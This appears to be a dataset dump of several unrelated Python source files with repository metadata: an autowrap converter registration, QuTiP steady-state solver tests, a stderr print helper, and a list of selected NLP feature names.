tests/test_files/converters/__init__.py
|
OpenMS/autowrap
|
050e63292b857a97b3cea7991d82bdedaaf7e4ee
|
[
"BSD-3-Clause"
] | 5
|
2022-01-05T20:31:50.000Z
|
2022-03-29T12:22:12.000Z
|
from .IntHolderConverter import IntHolderConverter
def register_converters():
from autowrap.ConversionProvider import special_converters
special_converters.append(IntHolderConverter())
| 24.5
| 62
| 0.836735
| 17
| 196
| 9.470588
| 0.588235
| 0.21118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112245
| 196
| 7
| 63
| 28
| 0.925287
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
941d65f91756e438ba3d033d639ae9e738ca0e77
| 15,694
|
py
|
Python
|
qutip/tests/test_steadystate.py
|
quantshah/qutip
|
88919ce50880dadbc1a817a3e6059c82c23a83f9
|
[
"BSD-3-Clause"
] | 1
|
2022-03-31T06:57:30.000Z
|
2022-03-31T06:57:30.000Z
|
qutip/tests/test_steadystate.py
|
quantshah/qutip
|
88919ce50880dadbc1a817a3e6059c82c23a83f9
|
[
"BSD-3-Clause"
] | null | null | null |
qutip/tests/test_steadystate.py
|
quantshah/qutip
|
88919ce50880dadbc1a817a3e6059c82c23a83f9
|
[
"BSD-3-Clause"
] | 1
|
2019-03-04T12:47:22.000Z
|
2019-03-04T12:47:22.000Z
|
import numpy as np
from numpy.testing import assert_, assert_equal, run_module_suite
from qutip import (sigmaz, destroy, steadystate, expect, coherent_dm,
build_preconditioner)
def test_qubit_direct():
"Steady state: Thermal qubit - direct solver"
# thermal steadystate of a qubit: compare numerics with analytical formula
sz = sigmaz()
sm = destroy(2)
H = 0.5 * 2 * np.pi * sz
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * sm)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * sm.dag())
rho_ss = steadystate(H, c_op_list, method='direct')
p_ss[idx] = expect(sm.dag() * sm, rho_ss)
p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-5, True)
def test_qubit_eigen():
"Steady state: Thermal qubit - eigen solver"
# thermal steadystate of a qubit: compare numerics with analytical formula
sz = sigmaz()
sm = destroy(2)
H = 0.5 * 2 * np.pi * sz
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * sm)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * sm.dag())
rho_ss = steadystate(H, c_op_list, method='eigen')
p_ss[idx] = expect(sm.dag() * sm, rho_ss)
p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-5, True)
def test_qubit_power():
"Steady state: Thermal qubit - power solver"
# thermal steadystate of a qubit: compare numerics with analytical formula
sz = sigmaz()
sm = destroy(2)
H = 0.5 * 2 * np.pi * sz
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * sm)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * sm.dag())
rho_ss = steadystate(H, c_op_list, method='power', mtol=1e-5)
p_ss[idx] = expect(sm.dag() * sm, rho_ss)
p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-5, True)
def test_qubit_power_gmres():
    "Steady state: Thermal qubit - power-gmres solver"
    # Thermal steady state of a two-level system: the numerically obtained
    # excited-state population must match the Boltzmann distribution.
    sz = sigmaz()
    sm = destroy(2)
    H = 0.5 * 2 * np.pi * sz
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * sm,    # emission into the bath
            np.sqrt(gamma1 * n_bath) * sm.dag(),    # absorption from the bath
        ]
        rho = steadystate(H, collapse_ops, method='power-gmres', mtol=1e-1)
        p_ss[k] = expect(sm.dag() * sm, rho)
    p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-5, True)
def test_qubit_power_bicgstab():
    "Steady state: Thermal qubit - power-bicgstab solver"
    # Thermal steady state of a two-level system: the numerically obtained
    # excited-state population must match the Boltzmann distribution.
    sz = sigmaz()
    sm = destroy(2)
    H = 0.5 * 2 * np.pi * sz
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * sm,    # emission into the bath
            np.sqrt(gamma1 * n_bath) * sm.dag(),    # absorption from the bath
        ]
        rho = steadystate(H, collapse_ops, method='power-bicgstab',
                          use_precond=1)
        p_ss[k] = expect(sm.dag() * sm, rho)
    p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-5, True)
def test_qubit_gmres():
    "Steady state: Thermal qubit - iterative-gmres solver"
    # Thermal steady state of a two-level system: the numerically obtained
    # excited-state population must match the Boltzmann distribution.
    sz = sigmaz()
    sm = destroy(2)
    H = 0.5 * 2 * np.pi * sz
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * sm,    # emission into the bath
            np.sqrt(gamma1 * n_bath) * sm.dag(),    # absorption from the bath
        ]
        rho = steadystate(H, collapse_ops, method='iterative-gmres')
        p_ss[k] = expect(sm.dag() * sm, rho)
    p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-5, True)
def test_qubit_bicgstab():
    "Steady state: Thermal qubit - iterative-bicgstab solver"
    # Thermal steady state of a two-level system: the numerically obtained
    # excited-state population must match the Boltzmann distribution.
    sz = sigmaz()
    sm = destroy(2)
    H = 0.5 * 2 * np.pi * sz
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * sm,    # emission into the bath
            np.sqrt(gamma1 * n_bath) * sm.dag(),    # absorption from the bath
        ]
        rho = steadystate(H, collapse_ops, method='iterative-bicgstab')
        p_ss[k] = expect(sm.dag() * sm, rho)
    p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-5, True)
def test_ho_direct():
    "Steady state: Thermal HO - direct solver"
    # Thermal steady state of a harmonic oscillator: the mean photon number
    # must reproduce the Bose-Einstein distribution.
    a = destroy(40)
    H = 0.5 * 2 * np.pi * a.dag() * a
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * a,       # photon loss
            np.sqrt(gamma1 * n_bath) * a.dag(),       # thermal pumping
        ]
        rho = steadystate(H, collapse_ops, method='direct')
        p_ss[k] = np.real(expect(a.dag() * a, rho))
    p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-3, True)
def test_ho_eigen():
    "Steady state: Thermal HO - eigen solver"
    # Thermal steady state of a harmonic oscillator: the mean photon number
    # must reproduce the Bose-Einstein distribution.
    a = destroy(40)
    H = 0.5 * 2 * np.pi * a.dag() * a
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * a,       # photon loss
            np.sqrt(gamma1 * n_bath) * a.dag(),       # thermal pumping
        ]
        rho = steadystate(H, collapse_ops, method='eigen')
        p_ss[k] = np.real(expect(a.dag() * a, rho))
    p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-3, True)
def test_ho_power():
    "Steady state: Thermal HO - power solver"
    # Thermal steady state of a harmonic oscillator: the mean photon number
    # must reproduce the Bose-Einstein distribution.
    a = destroy(40)
    H = 0.5 * 2 * np.pi * a.dag() * a
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * a,       # photon loss
            np.sqrt(gamma1 * n_bath) * a.dag(),       # thermal pumping
        ]
        rho = steadystate(H, collapse_ops, method='power', mtol=1e-5)
        p_ss[k] = np.real(expect(a.dag() * a, rho))
    p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-3, True)
def test_ho_power_gmres():
    "Steady state: Thermal HO - power-gmres solver"
    # Thermal steady state of a harmonic oscillator: the mean photon number
    # must reproduce the Bose-Einstein distribution.
    a = destroy(40)
    H = 0.5 * 2 * np.pi * a.dag() * a
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * a,       # photon loss
            np.sqrt(gamma1 * n_bath) * a.dag(),       # thermal pumping
        ]
        rho = steadystate(H, collapse_ops, method='power-gmres', mtol=1e-1,
                          use_precond=1)
        p_ss[k] = np.real(expect(a.dag() * a, rho))
    p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-3, True)
def test_ho_power_bicgstab():
    "Steady state: Thermal HO - power-bicgstab solver"
    # Thermal steady state of a harmonic oscillator: the mean photon number
    # must reproduce the Bose-Einstein distribution.
    a = destroy(40)
    H = 0.5 * 2 * np.pi * a.dag() * a
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * a,       # photon loss
            np.sqrt(gamma1 * n_bath) * a.dag(),       # thermal pumping
        ]
        rho = steadystate(H, collapse_ops, method='power-bicgstab',
                          use_precond=1)
        p_ss[k] = np.real(expect(a.dag() * a, rho))
    p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-3, True)
def test_ho_gmres():
    "Steady state: Thermal HO - iterative-gmres solver"
    # Thermal steady state of a harmonic oscillator: the mean photon number
    # must reproduce the Bose-Einstein distribution.
    a = destroy(40)
    H = 0.5 * 2 * np.pi * a.dag() * a
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * a,       # photon loss
            np.sqrt(gamma1 * n_bath) * a.dag(),       # thermal pumping
        ]
        rho = steadystate(H, collapse_ops, method='iterative-gmres')
        p_ss[k] = np.real(expect(a.dag() * a, rho))
    p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-3, True)
def test_ho_bicgstab():
    "Steady state: Thermal HO - iterative-bicgstab solver"
    # Thermal steady state of a harmonic oscillator: the mean photon number
    # must reproduce the Bose-Einstein distribution.
    a = destroy(40)
    H = 0.5 * 2 * np.pi * a.dag() * a
    gamma1 = 0.05
    wth_vec = np.linspace(0.1, 3, 20)
    p_ss = np.zeros(np.shape(wth_vec))
    for k, temp in enumerate(wth_vec):
        # Mean thermal occupation of the bath at this temperature.
        n_bath = 1.0 / (np.exp(1.0 / temp) - 1)
        collapse_ops = [
            np.sqrt(gamma1 * (1 + n_bath)) * a,       # photon loss
            np.sqrt(gamma1 * n_bath) * a.dag(),       # thermal pumping
        ]
        rho = steadystate(H, collapse_ops, method='iterative-bicgstab')
        p_ss[k] = np.real(expect(a.dag() * a, rho))
    p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
    delta = sum(abs(p_ss_analytic - p_ss))
    assert_equal(delta < 1e-3, True)
def test_driven_cavity_direct():
    "Steady state: Driven cavity - direct solver"
    # A coherently driven, damped cavity relaxes to a coherent state whose
    # amplitude is fixed by the drive-to-loss ratio.
    dim = 30
    drive = 0.01 * 2 * np.pi
    kappa = 0.05
    a = destroy(dim)
    H = drive * (a.dag() + a)
    loss_ops = [np.sqrt(kappa) * a]
    rho_num = steadystate(H, loss_ops, method='direct')
    rho_exact = coherent_dm(dim, -1.0j * drive / (kappa / 2))
    assert_((rho_num - rho_exact).norm() < 1e-4)
def test_driven_cavity_eigen():
    "Steady state: Driven cavity - eigen solver"
    # A coherently driven, damped cavity relaxes to a coherent state whose
    # amplitude is fixed by the drive-to-loss ratio.
    dim = 30
    drive = 0.01 * 2 * np.pi
    kappa = 0.05
    a = destroy(dim)
    H = drive * (a.dag() + a)
    loss_ops = [np.sqrt(kappa) * a]
    rho_num = steadystate(H, loss_ops, method='eigen')
    rho_exact = coherent_dm(dim, -1.0j * drive / (kappa / 2))
    assert_((rho_num - rho_exact).norm() < 1e-4)
def test_driven_cavity_power():
    "Steady state: Driven cavity - power solver"
    # A coherently driven, damped cavity relaxes to a coherent state whose
    # amplitude is fixed by the drive-to-loss ratio.
    dim = 30
    drive = 0.01 * 2 * np.pi
    kappa = 0.05
    a = destroy(dim)
    H = drive * (a.dag() + a)
    loss_ops = [np.sqrt(kappa) * a]
    rho_num = steadystate(H, loss_ops, method='power', mtol=1e-5)
    rho_exact = coherent_dm(dim, -1.0j * drive / (kappa / 2))
    assert_((rho_num - rho_exact).norm() < 1e-4)
def test_driven_cavity_power_gmres():
    "Steady state: Driven cavity - power-gmres solver"
    # A coherently driven, damped cavity relaxes to a coherent state whose
    # amplitude is fixed by the drive-to-loss ratio.
    dim = 30
    drive = 0.01 * 2 * np.pi
    kappa = 0.05
    a = destroy(dim)
    H = drive * (a.dag() + a)
    loss_ops = [np.sqrt(kappa) * a]
    # Precondition the iterative solve to speed up convergence.
    M = build_preconditioner(H, loss_ops, method='power')
    rho_num = steadystate(H, loss_ops, method='power-gmres', M=M, mtol=1e-1,
                          use_precond=1)
    rho_exact = coherent_dm(dim, -1.0j * drive / (kappa / 2))
    assert_((rho_num - rho_exact).norm() < 1e-4)
def test_driven_cavity_power_bicgstab():
    "Steady state: Driven cavity - power-bicgstab solver"
    # A coherently driven, damped cavity relaxes to a coherent state whose
    # amplitude is fixed by the drive-to-loss ratio.
    dim = 30
    drive = 0.01 * 2 * np.pi
    kappa = 0.05
    a = destroy(dim)
    H = drive * (a.dag() + a)
    loss_ops = [np.sqrt(kappa) * a]
    # Precondition the iterative solve to speed up convergence.
    M = build_preconditioner(H, loss_ops, method='power')
    rho_num = steadystate(H, loss_ops, method='power-bicgstab', M=M,
                          use_precond=1)
    rho_exact = coherent_dm(dim, -1.0j * drive / (kappa / 2))
    assert_((rho_num - rho_exact).norm() < 1e-4)
def test_driven_cavity_gmres():
    "Steady state: Driven cavity - iterative-gmres solver"
    # A coherently driven, damped cavity relaxes to a coherent state whose
    # amplitude is fixed by the drive-to-loss ratio.
    dim = 30
    drive = 0.01 * 2 * np.pi
    kappa = 0.05
    a = destroy(dim)
    H = drive * (a.dag() + a)
    loss_ops = [np.sqrt(kappa) * a]
    rho_num = steadystate(H, loss_ops, method='iterative-gmres')
    rho_exact = coherent_dm(dim, -1.0j * drive / (kappa / 2))
    assert_((rho_num - rho_exact).norm() < 1e-4)
def test_driven_cavity_bicgstab():
    "Steady state: Driven cavity - iterative-bicgstab solver"
    # A coherently driven, damped cavity relaxes to a coherent state whose
    # amplitude is fixed by the drive-to-loss ratio.
    dim = 30
    drive = 0.01 * 2 * np.pi
    kappa = 0.05
    a = destroy(dim)
    H = drive * (a.dag() + a)
    loss_ops = [np.sqrt(kappa) * a]
    rho_num = steadystate(H, loss_ops, method='iterative-bicgstab')
    rho_exact = coherent_dm(dim, -1.0j * drive / (kappa / 2))
    assert_((rho_num - rho_exact).norm() < 1e-4)
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    run_module_suite()
| 30.414729
| 82
| 0.592838
| 2,606
| 15,694
| 3.375672
| 0.040292
| 0.023872
| 0.044561
| 0.02785
| 0.953507
| 0.898943
| 0.891781
| 0.891781
| 0.891213
| 0.891213
| 0
| 0.044314
| 0.260928
| 15,694
| 515
| 83
| 30.473786
| 0.714113
| 0.146617
| 0
| 0.841667
| 0
| 0
| 0.084837
| 0
| 0
| 0
| 0
| 0
| 0.061111
| 1
| 0.058333
| false
| 0
| 0.008333
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94271bbb623d9ddb4cf1db355f75f122b4982a50
| 208
|
py
|
Python
|
confprint/err_print.py
|
lewiuberg/confprint
|
d092875b5bdac358c427d071371a9df991c0c6ab
|
[
"MIT"
] | 1
|
2022-02-09T08:11:34.000Z
|
2022-02-09T08:11:34.000Z
|
confprint/err_print.py
|
lewiuberg/confprint
|
d092875b5bdac358c427d071371a9df991c0c6ab
|
[
"MIT"
] | 10
|
2021-10-17T05:59:47.000Z
|
2022-02-03T15:14:55.000Z
|
confprint/err_print.py
|
lewiuberg/confprint
|
d092875b5bdac358c427d071371a9df991c0c6ab
|
[
"MIT"
] | null | null | null |
"""err_print uses sys.stderr.write() as the printer function."""
import sys
def err_print(*args, **kwargs) -> None:
    """Print to standard error.

    Behaves exactly like the built-in ``print()`` (same ``sep``/``end``
    handling), except that output is directed to ``sys.stderr``.
    """
    print(*args, file=sys.stderr, **kwargs)
| 23.111111
| 64
| 0.644231
| 30
| 208
| 4.4
| 0.566667
| 0.204545
| 0.212121
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 208
| 8
| 65
| 26
| 0.75
| 0.447115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 9
|
9479ec0280e5a6db9ef83de88c152ec2cee88033
| 23,291
|
py
|
Python
|
resources/features/selected/0_True_LinearSVC_C=2.0-1487943476.673364-NAMES.py
|
Rostlab/LocText
|
3871f860a5a68c192fadca3f9a9af9e7df3f2887
|
[
"Apache-2.0"
] | 4
|
2017-06-18T06:39:35.000Z
|
2019-02-19T02:54:32.000Z
|
resources/features/selected/0_True_LinearSVC_C=2.0-1487943476.673364-NAMES.py
|
juanmirocks/LocText
|
3871f860a5a68c192fadca3f9a9af9e7df3f2887
|
[
"Apache-2.0"
] | 35
|
2016-10-22T12:30:30.000Z
|
2017-03-25T09:58:43.000Z
|
resources/features/selected/0_True_LinearSVC_C=2.0-1487943476.673364-NAMES.py
|
juanmirocks/LocText
|
3871f860a5a68c192fadca3f9a9af9e7df3f2887
|
[
"Apache-2.0"
] | 2
|
2017-12-19T14:54:07.000Z
|
2019-12-10T01:23:30.000Z
|
[
"SentenceFeatureGenerator::1.2_counts_total_int_total (all classes)_[0]", # 0
"SentenceFeatureGenerator::1.1_counts_individual_int_individual_e_3_[0]", # 1
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<->_[0]", # 2
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<localize>_[0]", # 3
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_1_<PUNCT>_[0]", # 4
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<NOUN ~~ PUNCT>_[0]", # 5
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<NOUN ~~ TARGET]>_[0]", # 6
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<VERB ~~ NOUN ~~ PUNCT>_[0]", # 7
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ NOUN ~~ NOUN>_[0]", # 8
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<an>_[0]", # 9
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_1_<ADP>_[0]", # 10
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_1_<NUM>_[0]", # 11
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<[SOURCE ~~ VERB>_[0]", # 12
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<VERB ~~ ADP>_[0]", # 13
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<as>_[0]", # 14
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_1_<VERB>_[0]", # 15
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_1_<NOUN>_[0]", # 16
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<amod>_[0]", # 17
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<[SOURCE ~~ VERB>_[0]", # 18
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<ADP ~~ NOUN>_[0]", # 19
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<appos ~~ amod>_[0]", # 20
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<[SOURCE ~~ VERB ~~ ADP>_[0]", # 21
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<ADP ~~ NOUN ~~ NOUN>_[0]", # 22
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<)>_[0]", # 23
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<a>_[0]", # 24
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_1_<PROPN>_[0]", # 25
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_2 ~~ e_2>_[0]", # 26
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADJ ~~ NOUN>_[0]", # 27
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<PROPN ~~ NUM>_[0]", # 28
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<e_1 ~~ e_1 ~~ e_1>_[0]", # 29
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<ADJ ~~ NOUN ~~ PUNCT>_[0]", # 30
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ PUNCT ~~ VERB>_[0]", # 31
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ PROPN ~~ NUM>_[0]", # 32
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<[SOURCE ~~ NOUN>_[0]", # 33
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<mutant>_[0]", # 34
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<, ~~ the>_[0]", # 35
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<DET ~~ PROPN>_[0]", # 36
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADJ ~~ VERB>_[0]", # 37
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<in ~~ the ~~ TARGET]>_[0]", # 38
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<VERB ~~ ADP ~~ DET>_[0]", # 39
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<in>_[0]", # 40
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<pobj ~~ prep>_[0]", # 41
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<pobj ~~ prep ~~ pobj>_[0]", # 42
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<of>_[0]", # 43
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<cell>_[0]", # 44
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<at ~~ the>_[0]", # 45
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<DET ~~ NOUN>_[0]", # 46
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADP ~~ NOUN>_[0]", # 47
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<CONJ ~~ ADP>_[0]", # 48
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<at ~~ the ~~ TARGET]>_[0]", # 49
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<ADP ~~ NOUN ~~ VERB>_[0]", # 50
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ ADP ~~ DET>_[0]", # 51
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<subunit>_[0]", # 52
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<NOUN ~~ ADP ~~ TARGET]>_[0]", # 53
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<be>_[0]", # 54
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<VERB ~~ ADJ>_[0]", # 55
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<ADJ ~~ NOUN ~~ ADP>_[0]", # 56
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<e_1>_[0]", # 57
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<be>_[0]", # 58
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<from>_[0]", # 59
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<nmod>_[0]", # 60
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<acomp>_[0]", # 61
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<NOUN ~~ VERB>_[0]", # 62
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<VERB ~~ PROPN>_[0]", # 63
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ NOUN ~~ ADP>_[0]", # 64
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ CONJ ~~ VERB>_[0]", # 65
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<dobj>_[0]", # 66
